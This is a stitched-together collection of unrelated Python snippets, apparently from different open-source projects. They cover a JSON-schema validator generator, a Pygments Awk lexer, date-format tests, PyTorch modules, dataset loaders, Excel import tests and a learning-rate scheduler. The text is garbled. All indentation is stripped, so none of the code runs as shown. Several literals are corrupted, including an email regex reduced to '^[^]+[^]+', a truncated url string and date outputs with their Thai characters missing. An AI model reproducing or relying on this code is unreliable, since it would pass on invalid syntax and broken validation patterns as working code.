assert (dates.format_skeleton('yMEd', dt, locale='en_US') == 'Sun, 4/1/2007')
assert (dates.format_skeleton('yMEd', dt, locale='th') == '. 1/4/2007')
assert (dates.format_skeleton('EHm', dt, locale='en') == 'Sun 15:30')
assert (dates.format_skeleton('EHm', dt, tzinfo=timezone_getter('Asia/Bangkok'), locale='th') == '. 22:30 .') |
class CodeGeneratorDraft04(CodeGenerator):
FORMAT_REGEXS = {'date-time': '^\\d{4}-[01]\\d-[0-3]\\d(t|T)[0-2]\\d:[0-5]\\d:[0-5]\\d(?:\\.\\d+)?(?:[+-][0-2]\\d:[0-5]\\d|[+-][0-2]\\d[0-5]\\d|z|Z)\\Z', 'email': '^[^]+[^]+\\.[^]+\\Z', 'hostname': '^(([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\\-]{0,61}[a-zA-Z0-9])\\.)*([A-Za-z0-9]|[A-Za-z0-9][A-Za-z0-9\\-]{0,61}[A-Za-z0-9])\\Z', 'ipv4': '^((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\Z', 'ipv6': '^(?:(?:[0-9A-Fa-f]{1,4}:){6}(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|::(?:[0-9A-Fa-f]{1,4}:){5}(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|(?:[0-9A-Fa-f]{1,4})?::(?:[0-9A-Fa-f]{1,4}:){4}(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4})?::(?:[0-9A-Fa-f]{1,4}:){3}(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|(?:(?:[0-9A-Fa-f]{1,4}:){,2}[0-9A-Fa-f]{1,4})?::(?:[0-9A-Fa-f]{1,4}:){2}(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|(?:(?:[0-9A-Fa-f]{1,4}:){,3}[0-9A-Fa-f]{1,4})?::[0-9A-Fa-f]{1,4}:(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|(?:(?:[0-9A-Fa-f]{1,4}:){,4}[0-9A-Fa-f]{1,4})?::(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|(?:(?:[0-9A-Fa-f]{1,4}:){,5}[0-9A-Fa-f]{1,4})?::[0-9A-Fa-f]{1,4}|(?:(?:[0-9A-Fa-f]{1,4}:){,6}[0-9A-Fa-f]{1,4})?::)\\Z', 'uri': '^\\w+:(\\/?\\/?)[^\\s]+\\Z'}
def __init__(self, definition, resolver=None, formats={}, use_default=True):
super().__init__(definition, resolver)
self._custom_formats = formats
self._use_default = use_default
self._json_keywords_to_function.update((('type', self.generate_type), ('enum', self.generate_enum), ('allOf', self.generate_all_of), ('anyOf', self.generate_any_of), ('oneOf', self.generate_one_of), ('not', self.generate_not), ('minLength', self.generate_min_length), ('maxLength', self.generate_max_length), ('pattern', self.generate_pattern), ('format', self.generate_format), ('minimum', self.generate_minimum), ('maximum', self.generate_maximum), ('multipleOf', self.generate_multiple_of), ('minItems', self.generate_min_items), ('maxItems', self.generate_max_items), ('uniqueItems', self.generate_unique_items), ('items', self.generate_items), ('minProperties', self.generate_min_properties), ('maxProperties', self.generate_max_properties), ('required', self.generate_required), ('dependencies', self.generate_dependencies), ('properties', self.generate_properties), ('patternProperties', self.generate_pattern_properties), ('additionalProperties', self.generate_additional_properties)))
self._any_or_one_of_count = 0
def global_state(self):
res = super().global_state
res['custom_formats'] = self._custom_formats
return res
def generate_type(self):
types = enforce_list(self._definition['type'])
try:
python_types = ', '.join((JSON_TYPE_TO_PYTHON_TYPE[t] for t in types))
except KeyError as exc:
raise JsonSchemaDefinitionException('Unknown type: {}'.format(exc))
extra = ''
if ((('number' in types) or ('integer' in types)) and ('boolean' not in types)):
extra = ' or isinstance({variable}, bool)'.format(variable=self._variable)
with self.l('if not isinstance({variable}, ({})){}:', python_types, extra):
self.exc('{name} must be {}', ' or '.join(types), rule='type')
def generate_enum(self):
enum = self._definition['enum']
if (not isinstance(enum, (list, tuple))):
raise JsonSchemaDefinitionException('enum must be an array')
with self.l('if {variable} not in {enum}:'):
self.exc('{name} must be one of {}', self.e(enum), rule='enum')
def generate_all_of(self):
for definition_item in self._definition['allOf']:
self.generate_func_code_block(definition_item, self._variable, self._variable_name, clear_variables=True)
def generate_any_of(self):
self._any_or_one_of_count += 1
count = self._any_or_one_of_count
self.l('{variable}_any_of_count{count} = 0', count=count)
for definition_item in self._definition['anyOf']:
with self.l('if not {variable}_any_of_count{count}:', count=count, optimize=False):
with self.l('try:', optimize=False):
self.generate_func_code_block(definition_item, self._variable, self._variable_name, clear_variables=True)
self.l('{variable}_any_of_count{count} += 1', count=count)
self.l('except JsonSchemaValueException: pass')
with self.l('if not {variable}_any_of_count{count}:', count=count, optimize=False):
self.exc('{name} cannot be validated by any definition', rule='anyOf')
def generate_one_of(self):
self._any_or_one_of_count += 1
count = self._any_or_one_of_count
self.l('{variable}_one_of_count{count} = 0', count=count)
for definition_item in self._definition['oneOf']:
with self.l('if {variable}_one_of_count{count} < 2:', count=count, optimize=False):
with self.l('try:', optimize=False):
self.generate_func_code_block(definition_item, self._variable, self._variable_name, clear_variables=True)
self.l('{variable}_one_of_count{count} += 1', count=count)
self.l('except JsonSchemaValueException: pass')
with self.l('if {variable}_one_of_count{count} != 1:', count=count):
dynamic = '" (" + str({variable}_one_of_count{}) + " matches found)"'
self.exc('{name} must be valid exactly by one definition', count, append_to_msg=dynamic, rule='oneOf')
def generate_not(self):
not_definition = self._definition['not']
if (not_definition is True):
self.exc('{name} must not be there', rule='not')
elif (not_definition is False):
return
elif (not not_definition):
with self.l('if {}:', self._variable):
self.exc('{name} must NOT match a disallowed definition', rule='not')
else:
with self.l('try:', optimize=False):
self.generate_func_code_block(not_definition, self._variable, self._variable_name)
self.l('except JsonSchemaValueException: pass')
with self.l('else:'):
self.exc('{name} must NOT match a disallowed definition', rule='not')
def generate_min_length(self):
with self.l('if isinstance({variable}, str):'):
self.create_variable_with_length()
if (not isinstance(self._definition['minLength'], int)):
raise JsonSchemaDefinitionException('minLength must be a number')
with self.l('if {variable}_len < {minLength}:'):
self.exc('{name} must be longer than or equal to {minLength} characters', rule='minLength')
def generate_max_length(self):
with self.l('if isinstance({variable}, str):'):
self.create_variable_with_length()
if (not isinstance(self._definition['maxLength'], int)):
raise JsonSchemaDefinitionException('maxLength must be a number')
with self.l('if {variable}_len > {maxLength}:'):
self.exc('{name} must be shorter than or equal to {maxLength} characters', rule='maxLength')
def generate_pattern(self):
with self.l('if isinstance({variable}, str):'):
pattern = self._definition['pattern']
safe_pattern = pattern.replace('\\', '\\\\').replace('"', '\\"')
end_of_string_fixed_pattern = DOLLAR_FINDER.sub('\\\\Z', pattern)
self._compile_regexps[pattern] = re.compile(end_of_string_fixed_pattern)
with self.l('if not REGEX_PATTERNS[{}].search({variable}):', repr(pattern)):
self.exc('{name} must match pattern {}', safe_pattern, rule='pattern')
def generate_format(self):
with self.l('if isinstance({variable}, str):'):
format_ = self._definition['format']
if (format_ in self._custom_formats):
custom_format = self._custom_formats[format_]
if isinstance(custom_format, str):
self._generate_format(format_, (format_ + '_re_pattern'), custom_format)
else:
with self.l('if not custom_formats["{}"]({variable}):', format_):
self.exc('{name} must be {}', format_, rule='format')
elif (format_ in self.FORMAT_REGEXS):
format_regex = self.FORMAT_REGEXS[format_]
self._generate_format(format_, (format_ + '_re_pattern'), format_regex)
elif (format_ == 'regex'):
with self.l('try:', optimize=False):
self.l('re.compile({variable})')
with self.l('except Exception:'):
self.exc('{name} must be a valid regex', rule='format')
else:
raise JsonSchemaDefinitionException('Unknown format: {}'.format(format_))
def _generate_format(self, format_name, regexp_name, regexp):
if (self._definition['format'] == format_name):
if (not (regexp_name in self._compile_regexps)):
self._compile_regexps[regexp_name] = re.compile(regexp)
with self.l('if not REGEX_PATTERNS["{}"].match({variable}):', regexp_name):
self.exc('{name} must be {}', format_name, rule='format')
def generate_minimum(self):
with self.l('if isinstance({variable}, (int, float, Decimal)):'):
if (not isinstance(self._definition['minimum'], (int, float, decimal.Decimal))):
raise JsonSchemaDefinitionException('minimum must be a number')
if self._definition.get('exclusiveMinimum', False):
with self.l('if {variable} <= {minimum}:'):
self.exc('{name} must be bigger than {minimum}', rule='minimum')
else:
with self.l('if {variable} < {minimum}:'):
self.exc('{name} must be bigger than or equal to {minimum}', rule='minimum')
def generate_maximum(self):
with self.l('if isinstance({variable}, (int, float, Decimal)):'):
if (not isinstance(self._definition['maximum'], (int, float, decimal.Decimal))):
raise JsonSchemaDefinitionException('maximum must be a number')
if self._definition.get('exclusiveMaximum', False):
with self.l('if {variable} >= {maximum}:'):
self.exc('{name} must be smaller than {maximum}', rule='maximum')
else:
with self.l('if {variable} > {maximum}:'):
self.exc('{name} must be smaller than or equal to {maximum}', rule='maximum')
def generate_multiple_of(self):
with self.l('if isinstance({variable}, (int, float, Decimal)):'):
if (not isinstance(self._definition['multipleOf'], (int, float, decimal.Decimal))):
raise JsonSchemaDefinitionException('multipleOf must be a number')
if isinstance(self._definition['multipleOf'], float):
self.l('quotient = Decimal(repr({variable})) / Decimal(repr({multipleOf}))')
else:
self.l('quotient = {variable} / {multipleOf}')
with self.l('if int(quotient) != quotient:'):
self.exc('{name} must be multiple of {multipleOf}', rule='multipleOf')
def generate_min_items(self):
self.create_variable_is_list()
with self.l('if {variable}_is_list:'):
if (not isinstance(self._definition['minItems'], int)):
raise JsonSchemaDefinitionException('minItems must be a number')
self.create_variable_with_length()
with self.l('if {variable}_len < {minItems}:'):
self.exc('{name} must contain at least {minItems} items', rule='minItems')
def generate_max_items(self):
self.create_variable_is_list()
with self.l('if {variable}_is_list:'):
if (not isinstance(self._definition['maxItems'], int)):
raise JsonSchemaDefinitionException('maxItems must be a number')
self.create_variable_with_length()
with self.l('if {variable}_len > {maxItems}:'):
self.exc('{name} must contain less than or equal to {maxItems} items', rule='maxItems')
def generate_unique_items(self):
unique_definition = self._definition['uniqueItems']
if (not unique_definition):
return
self.create_variable_is_list()
with self.l('if {variable}_is_list:'):
self.l('def fn(var): return frozenset(dict((k, fn(v)) for k, v in var.items()).items()) if hasattr(var, "items") else tuple(fn(v) for v in var) if isinstance(var, (dict, list)) else str(var) if isinstance(var, bool) else var')
self.create_variable_with_length()
with self.l('if {variable}_len > len(set(fn({variable}_x) for {variable}_x in {variable})):'):
self.exc('{name} must contain unique items', rule='uniqueItems')
def generate_items(self):
items_definition = self._definition['items']
if (items_definition is True):
return
self.create_variable_is_list()
with self.l('if {variable}_is_list:'):
self.create_variable_with_length()
if (items_definition is False):
with self.l('if {variable}:'):
self.exc('{name} must not be there', rule='items')
elif isinstance(items_definition, list):
for (idx, item_definition) in enumerate(items_definition):
with self.l('if {variable}_len > {}:', idx):
self.l('{variable}__{0} = {variable}[{0}]', idx)
self.generate_func_code_block(item_definition, '{}__{}'.format(self._variable, idx), '{}[{}]'.format(self._variable_name, idx))
if (self._use_default and isinstance(item_definition, dict) and ('default' in item_definition)):
self.l('else: {variable}.append({})', repr(item_definition['default']))
if ('additionalItems' in self._definition):
if (self._definition['additionalItems'] is False):
with self.l('if {variable}_len > {}:', len(items_definition)):
self.exc('{name} must contain only specified items', rule='items')
else:
with self.l('for {variable}_x, {variable}_item in enumerate({variable}[{0}:], {0}):', len(items_definition)):
count = self.generate_func_code_block(self._definition['additionalItems'], '{}_item'.format(self._variable), '{}[{{{}_x}}]'.format(self._variable_name, self._variable))
if (count == 0):
self.l('pass')
elif items_definition:
with self.l('for {variable}_x, {variable}_item in enumerate({variable}):'):
count = self.generate_func_code_block(items_definition, '{}_item'.format(self._variable), '{}[{{{}_x}}]'.format(self._variable_name, self._variable))
if (count == 0):
self.l('pass')
def generate_min_properties(self):
self.create_variable_is_dict()
with self.l('if {variable}_is_dict:'):
if (not isinstance(self._definition['minProperties'], int)):
raise JsonSchemaDefinitionException('minProperties must be a number')
self.create_variable_with_length()
with self.l('if {variable}_len < {minProperties}:'):
self.exc('{name} must contain at least {minProperties} properties', rule='minProperties')
def generate_max_properties(self):
self.create_variable_is_dict()
with self.l('if {variable}_is_dict:'):
if (not isinstance(self._definition['maxProperties'], int)):
raise JsonSchemaDefinitionException('maxProperties must be a number')
self.create_variable_with_length()
with self.l('if {variable}_len > {maxProperties}:'):
self.exc('{name} must contain less than or equal to {maxProperties} properties', rule='maxProperties')
def generate_required(self):
self.create_variable_is_dict()
with self.l('if {variable}_is_dict:'):
if (not isinstance(self._definition['required'], (list, tuple))):
raise JsonSchemaDefinitionException('required must be an array')
self.l('{variable}__missing_keys = set({required}) - {variable}.keys()')
with self.l('if {variable}__missing_keys:'):
dynamic = 'str(sorted({variable}__missing_keys)) + " properties"'
self.exc('{name} must contain ', self.e(self._definition['required']), rule='required', append_to_msg=dynamic)
def generate_properties(self):
self.create_variable_is_dict()
with self.l('if {variable}_is_dict:'):
self.create_variable_keys()
for (key, prop_definition) in self._definition['properties'].items():
key_name = re.sub('($[^a-zA-Z]|[^a-zA-Z0-9])', '', key)
if (not isinstance(prop_definition, (dict, bool))):
raise JsonSchemaDefinitionException('{}[{}] must be object'.format(self._variable, key_name))
with self.l('if "{}" in {variable}_keys:', self.e(key)):
self.l('{variable}_keys.remove("{}")', self.e(key))
self.l('{variable}__{0} = {variable}["{1}"]', key_name, self.e(key))
self.generate_func_code_block(prop_definition, '{}__{}'.format(self._variable, key_name), '{}.{}'.format(self._variable_name, self.e(key)), clear_variables=True)
if (self._use_default and isinstance(prop_definition, dict) and ('default' in prop_definition)):
self.l('else: {variable}["{}"] = {}', self.e(key), repr(prop_definition['default']))
def generate_pattern_properties(self):
self.create_variable_is_dict()
with self.l('if {variable}_is_dict:'):
self.create_variable_keys()
for (pattern, definition) in self._definition['patternProperties'].items():
self._compile_regexps[pattern] = re.compile(pattern)
with self.l('for {variable}_key, {variable}_val in {variable}.items():'):
for (pattern, definition) in self._definition['patternProperties'].items():
with self.l('if REGEX_PATTERNS[{}].search({variable}_key):', repr(pattern)):
with self.l('if {variable}_key in {variable}_keys:'):
self.l('{variable}_keys.remove({variable}_key)')
self.generate_func_code_block(definition, '{}_val'.format(self._variable), '{}.{{{}_key}}'.format(self._variable_name, self._variable), clear_variables=True)
def generate_additional_properties(self):
self.create_variable_is_dict()
with self.l('if {variable}_is_dict:'):
self.create_variable_keys()
add_prop_definition = self._definition['additionalProperties']
if ((add_prop_definition is True) or (add_prop_definition == {})):
return
if add_prop_definition:
properties_keys = list(self._definition.get('properties', {}).keys())
with self.l('for {variable}_key in {variable}_keys:'):
with self.l('if {variable}_key not in {}:', properties_keys):
self.l('{variable}_value = {variable}.get({variable}_key)')
self.generate_func_code_block(add_prop_definition, '{}_value'.format(self._variable), '{}.{{{}_key}}'.format(self._variable_name, self._variable))
else:
with self.l('if {variable}_keys:'):
self.exc('{name} must not contain "+str({variable}_keys)+" properties', rule='additionalProperties')
def generate_dependencies(self):
self.create_variable_is_dict()
with self.l('if {variable}_is_dict:'):
is_empty = True
for (key, values) in self._definition['dependencies'].items():
if ((values == []) or (values is True)):
continue
is_empty = False
with self.l('if "{}" in {variable}:', self.e(key)):
if (values is False):
self.exc('{} in {name} must not be there', key, rule='dependencies')
elif isinstance(values, list):
for value in values:
with self.l('if "{}" not in {variable}:', self.e(value)):
self.exc('{name} missing dependency {} for {}', self.e(value), self.e(key), rule='dependencies')
else:
self.generate_func_code_block(values, self._variable, self._variable_name, clear_variables=True)
if is_empty:
self.l('pass') |
class AwkLexer(RegexLexer):
name = 'Awk'
aliases = ['awk', 'gawk', 'mawk', 'nawk']
filenames = ['*.awk']
mimetypes = ['application/x-awk']
url = '
version_added = '1.5'
tokens = {'commentsandwhitespace': [('\\s+', Text), ('#.*$', Comment.Single)], 'slashstartsregex': [include('commentsandwhitespace'), ('/(\\\\.|[^[/\\\\\\n]|\\[(\\\\.|[^\\]\\\\\\n])*])+/\\B', String.Regex, '#pop'), ('(?=/)', Text, ('#pop', 'badregex')), default('#pop')], 'badregex': [('\\n', Text, '#pop')], 'root': [('^(?=\\s|/)', Text, 'slashstartsregex'), include('commentsandwhitespace'), ('\\+\\+|--|\\|\\||&&|in\\b|\\$|!?~|(\\*\\*|[-<>+*%\\^/!=|])=?', Operator, 'slashstartsregex'), ('[{(\\[;,]', Punctuation, 'slashstartsregex'), ('[})\\].]', Punctuation), ('(break|continue|do|while|exit|for|if|else|return)\\b', Keyword, 'slashstartsregex'), ('function\\b', Keyword.Declaration, 'slashstartsregex'), ('(atan2|cos|exp|int|log|rand|sin|sqrt|srand|gensub|gsub|index|length|match|split|sprintf|sub|substr|tolower|toupper|close|fflush|getline|next|nextfile|print|printf|strftime|systime|delete|system)\\b', Keyword.Reserved), ('(ARGC|ARGIND|ARGV|BEGIN|CONVFMT|ENVIRON|END|ERRNO|FIELDWIDTHS|FILENAME|FNR|FS|IGNORECASE|NF|NR|OFMT|OFS|ORFS|RLENGTH|RS|RSTART|RT|SUBSEP)\\b', Name.Builtin), ('[$a-zA-Z_]\\w*', Name.Other), ('[0-9][0-9]*\\.[0-9]+([eE][0-9]+)?[fd]?', Number.Float), ('0x[0-9a-fA-F]+', Number.Hex), ('[0-9]+', Number.Integer), ('"(|\\\\[^\\\\]|[^"\\\\])*"', String.Double), ("'(|\\\\[^\\\\]|[^'\\\\])*'", String.Single)]} |
def get_info(python=sys.executable):
if (python and (python != sys.executable)):
import subprocess
argv = [python, __file__]
try:
text = subprocess.check_output(argv, encoding='utf-8')
except subprocess.CalledProcessError:
raise Exception(f'could not get info for {(python or sys.executable)}')
data = _unjsonify_info(text)
else:
data = _get_current_info()
return _build_info(data) |
def infer_property(node: nodes.Call, context: (InferenceContext | None)=None) -> objects.Property:
if (len(node.args) < 1):
raise UseInferenceDefault
getter = node.args[0]
try:
inferred = next(getter.infer(context=context))
except (InferenceError, StopIteration) as exc:
raise UseInferenceDefault from exc
if (not isinstance(inferred, (nodes.FunctionDef, nodes.Lambda))):
raise UseInferenceDefault
prop_func = objects.Property(function=inferred, name=inferred.name, lineno=node.lineno, col_offset=node.col_offset)
prop_func.parent = node
prop_func.postinit(body=[], args=inferred.args, doc_node=getattr(inferred, 'doc_node', None))
return prop_func |
class TransformerAttentionSepModule(nn.Module):
def __init__(self, dim, num_heads, dropout, **kwargs):
super().__init__()
_check_dim_and_num_heads_consistency(dim, num_heads)
self.dim = dim
self.num_heads = num_heads
self.head_dim = (dim // num_heads)
self.attn_query = nn.Linear(in_features=dim, out_features=dim)
self.attn_key = nn.Linear(in_features=dim, out_features=dim)
self.attn_value = nn.Linear(in_features=dim, out_features=dim)
self.output_linear = nn.Linear(in_features=(dim * 2), out_features=dim)
self.dropout = nn.Dropout(p=dropout)
def forward(self, graph, x):
queries = self.attn_query(x)
keys = self.attn_key(x)
values = self.attn_value(x)
queries = queries.reshape((- 1), self.num_heads, self.head_dim)
keys = keys.reshape((- 1), self.num_heads, self.head_dim)
values = values.reshape((- 1), self.num_heads, self.head_dim)
attn_scores = (ops.u_dot_v(graph, queries, keys) / (self.head_dim ** 0.5))
attn_probs = edge_softmax(graph, attn_scores)
message = ops.u_mul_e_sum(graph, values, attn_probs)
message = message.reshape((- 1), self.dim)
x = torch.cat([x, message], axis=1)
x = self.output_linear(x)
x = self.dropout(x)
return x |
def prepare_predict_dataset1(args):
matches = DataCleaner(args)
used_column = ['rally_id', 'player', 'type', 'player_location_x', 'player_location_y', 'opponent_location_x', 'opponent_location_y', 'ball_round', 'set', 'match_id']
matches = matches[used_column]
(player_codes, player_uniques) = pd.factorize(matches['player'])
matches['player'] = (player_codes + 1)
print(len(matches))
(type_codes, type_uniques) = pd.factorize(matches['type'])
matches['type'] = (type_codes + 1)
dataset = BadmintonDataset(matches, used_column, args)
g = torch.Generator()
g.manual_seed(0)
return (dataset, args) |
def get_walks_intersection_ops(forward_seed_ops, backward_seed_ops, forward_inclusive=True, backward_inclusive=True, within_ops=None, within_ops_fn=None, control_inputs=False, control_outputs=None, control_ios=None):
(control_inputs, control_outputs) = check_cios(control_inputs, control_outputs, control_ios)
forward_ops = get_forward_walk_ops(forward_seed_ops, inclusive=forward_inclusive, within_ops=within_ops, within_ops_fn=within_ops_fn, control_outputs=control_outputs)
backward_ops = get_backward_walk_ops(backward_seed_ops, inclusive=backward_inclusive, within_ops=within_ops, within_ops_fn=within_ops_fn, control_inputs=control_inputs)
return [op for op in forward_ops if (op in backward_ops)] |
class ParallelSentencesDataset(Dataset):
def __init__(self, student_model: SentenceTransformer, teacher_model: SentenceTransformer, batch_size: int=8, use_embedding_cache: bool=True):
self.student_model = student_model
self.teacher_model = teacher_model
self.datasets = []
self.datasets_iterator = []
self.datasets_tokenized = []
self.dataset_indices = []
self.copy_dataset_indices = []
self.cache = []
self.batch_size = batch_size
self.use_embedding_cache = use_embedding_cache
self.embedding_cache = {}
self.num_sentences = 0
def load_data(self, filepath: str, weight: int=100, max_sentences: int=None, max_sentence_length: int=128):
logging.info(('Load ' + filepath))
parallel_sentences = []
with (gzip.open(filepath, 'rt', encoding='utf8') if filepath.endswith('.gz') else open(filepath, encoding='utf8')) as fIn:
count = 0
for line in fIn:
sentences = line.strip().split('\t')
if ((max_sentence_length is not None) and (max_sentence_length > 0) and (max([len(sent) for sent in sentences]) > max_sentence_length)):
continue
parallel_sentences.append(sentences)
count += 1
if ((max_sentences is not None) and (max_sentences > 0) and (count >= max_sentences)):
break
self.add_dataset(parallel_sentences, weight=weight, max_sentences=max_sentences, max_sentence_length=max_sentence_length)
def add_dataset(self, parallel_sentences: List[List[str]], weight: int=100, max_sentences: int=None, max_sentence_length: int=128):
sentences_map = {}
for sentences in parallel_sentences:
if ((max_sentence_length is not None) and (max_sentence_length > 0) and (max([len(sent) for sent in sentences]) > max_sentence_length)):
continue
source_sentence = sentences[0]
if (source_sentence not in sentences_map):
sentences_map[source_sentence] = set()
for sent in sentences:
sentences_map[source_sentence].add(sent)
if ((max_sentences is not None) and (max_sentences > 0) and (len(sentences_map) >= max_sentences)):
break
if (len(sentences_map) == 0):
return
self.num_sentences += sum([len(sentences_map[sent]) for sent in sentences_map])
dataset_id = len(self.datasets)
self.datasets.append(list(sentences_map.items()))
self.datasets_iterator.append(0)
self.datasets_tokenized.append(False)
self.dataset_indices.extend(([dataset_id] * weight))
def generate_data(self):
source_sentences_list = []
target_sentences_list = []
for data_idx in self.dataset_indices:
(src_sentence, trg_sentences) = self.next_entry(data_idx)
source_sentences_list.append(src_sentence)
target_sentences_list.append(trg_sentences)
src_embeddings = self.get_embeddings(source_sentences_list)
for (src_embedding, trg_sentences) in zip(src_embeddings, target_sentences_list):
for trg_sentence in trg_sentences:
self.cache.append([[trg_sentence], src_embedding])
random.shuffle(self.cache)
def next_entry(self, data_idx):
(source, target_sentences) = self.datasets[data_idx][self.datasets_iterator[data_idx]]
if (not self.datasets_tokenized[data_idx]):
target_sentences = [self.student_model.tokenize(sent) for sent in target_sentences]
self.datasets[data_idx][self.datasets_iterator[data_idx]] = [source, target_sentences]
self.datasets_iterator[data_idx] += 1
if (self.datasets_iterator[data_idx] >= len(self.datasets[data_idx])):
self.datasets_iterator[data_idx] = 0
self.datasets_tokenized[data_idx] = True
random.shuffle(self.datasets[data_idx])
return (source, target_sentences)
def get_embeddings(self, sentences):
if (not self.use_embedding_cache):
return self.teacher_model.encode(sentences, batch_size=self.batch_size, show_progress_bar=False, convert_to_numpy=False)
new_sentences = []
for sent in sentences:
if (sent not in self.embedding_cache):
new_sentences.append(sent)
if (len(new_sentences) > 0):
new_embeddings = self.teacher_model.encode(new_sentences, batch_size=self.batch_size, show_progress_bar=False, convert_to_numpy=False)
for (sent, embedding) in zip(new_sentences, new_embeddings):
self.embedding_cache[sent] = embedding
return [self.embedding_cache[sent] for sent in sentences]
def __len__(self):
return self.num_sentences
def __getitem__(self, idx):
if (len(self.cache) == 0):
self.generate_data()
return self.cache.pop() |
class PooledEmbeddingsAwaitable(Awaitable[torch.Tensor]):
def __init__(self, tensor_awaitable: Awaitable[torch.Tensor]) -> None:
super().__init__()
self._tensor_awaitable = tensor_awaitable
def _wait_impl(self) -> torch.Tensor:
ret = self._tensor_awaitable.wait()
return ret
def callbacks(self) -> List[Callable[([torch.Tensor], torch.Tensor)]]:
return self._callbacks |
class TestExcelImport(TestCaseWithFileOutput):
_tmp_dir = join(dirname(__file__), 'tmp')
_templates_dir = join(dirname(__file__), 'dummies')
def setUp(self):
dates = DatetimeIndex(date_range(start='2014-01-01', freq='d', periods=10))
returns = np.arange(0, 1, 0.1)
self.test_series = QFSeries(index=dates, data=returns)
reversed_returns = returns[::(- 1)]
test_series_reversed = QFSeries(index=dates, data=reversed_returns)
self.test_data_frame = concat([self.test_series, test_series_reversed], axis=1, join='inner')
self.xl_importer = ExcelImporter()
def tearDown(self):
self.clear_tmp_dir()
def tmp_dir(self):
return self._tmp_dir
def templates_dir(self):
return self._templates_dir
def test_import_series(self):
template_file_path = self.template_file_path(SINGLE_SHEET_ONE_SERIES)
imported_series = self.xl_importer.import_container(file_path=template_file_path, container_type=QFSeries, starting_cell='A1', ending_cell='B10')
assert_series_equal(self.test_series, imported_series)
def test_import_dataframe(self):
template_file_path = self.template_file_path(SINGLE_SHEET_ONE_DATA_FRAME)
imported_dataframe = self.xl_importer.import_container(file_path=template_file_path, container_type=QFDataFrame, starting_cell='A1', ending_cell='C10')
assert_dataframes_equal(self.test_data_frame, imported_dataframe)
def test_import_custom_dataframe(self):
template_file_path = self.template_file_path(SINGLE_SHEET_CUSTOM_INDEX_DATA_FRAME)
df = QFDataFrame({'Test': [1, 2, 3, 4, 5], 'Test2': [10, 20, 30, 40, 50]}, ['A', 'B', 'C', 'D', 'E'])
imported_dataframe = self.xl_importer.import_container(file_path=template_file_path, container_type=QFDataFrame, starting_cell='A10', ending_cell='C15', include_index=True, include_column_names=True)
assert_dataframes_equal(df, imported_dataframe)
def test_import_custom_dataframe_shifted(self):
template_file_path = self.template_file_path(SINGLE_SHEET_CUSTOM_INDEX_DATA_FRAME_SHIFTED)
df = QFDataFrame({'Test': [1, 2, 3, 4, 5], 'Test2': [10, 20, 30, 40, 50]}, ['A', 'B', 'C', 'D', 'E'])
imported_dataframe = self.xl_importer.import_container(file_path=template_file_path, container_type=QFDataFrame, starting_cell='C10', ending_cell='E15', include_index=True, include_column_names=True)
assert_dataframes_equal(df, imported_dataframe)
df = QFDataFrame({0: [1, 2, 3, 4, 5], 1: [10, 20, 30, 40, 50]}, ['A', 'B', 'C', 'D', 'E'])
imported_dataframe = self.xl_importer.import_container(file_path=template_file_path, container_type=QFDataFrame, starting_cell='C11', ending_cell='E15', include_index=True, include_column_names=False)
assert_dataframes_equal(df, imported_dataframe)
df = QFDataFrame({'Test': [1, 2, 3, 4, 5], 'Test2': [10, 20, 30, 40, 50]})
imported_dataframe = self.xl_importer.import_container(file_path=template_file_path, container_type=QFDataFrame, starting_cell='D10', ending_cell='E15', include_index=False, include_column_names=True)
assert_dataframes_equal(df, imported_dataframe)
df = QFDataFrame({0: [1, 2, 3, 4, 5], 1: [10, 20, 30, 40, 50]})
imported_dataframe = self.xl_importer.import_container(file_path=template_file_path, container_type=QFDataFrame, starting_cell='D11', ending_cell='E15', include_index=False, include_column_names=False)
assert_dataframes_equal(df, imported_dataframe) |
class WarmupCosineLR(torch.optim.lr_scheduler._LRScheduler):
def __init__(self, optimizer: torch.optim.Optimizer, max_iters: int, warmup_factor: float=0.001, warmup_iters: int=1000, warmup_method: str='linear', last_epoch: int=(- 1)):
logger.warning('WarmupCosineLR is deprecated! Use LRMultipilier with fvcore ParamScheduler instead!')
self.max_iters = max_iters
self.warmup_factor = warmup_factor
self.warmup_iters = warmup_iters
self.warmup_method = warmup_method
super().__init__(optimizer, last_epoch)
def get_lr(self) -> List[float]:
warmup_factor = _get_warmup_factor_at_iter(self.warmup_method, self.last_epoch, self.warmup_iters, self.warmup_factor)
return [(((base_lr * warmup_factor) * 0.5) * (1.0 + math.cos(((math.pi * self.last_epoch) / self.max_iters)))) for base_lr in self.base_lrs]
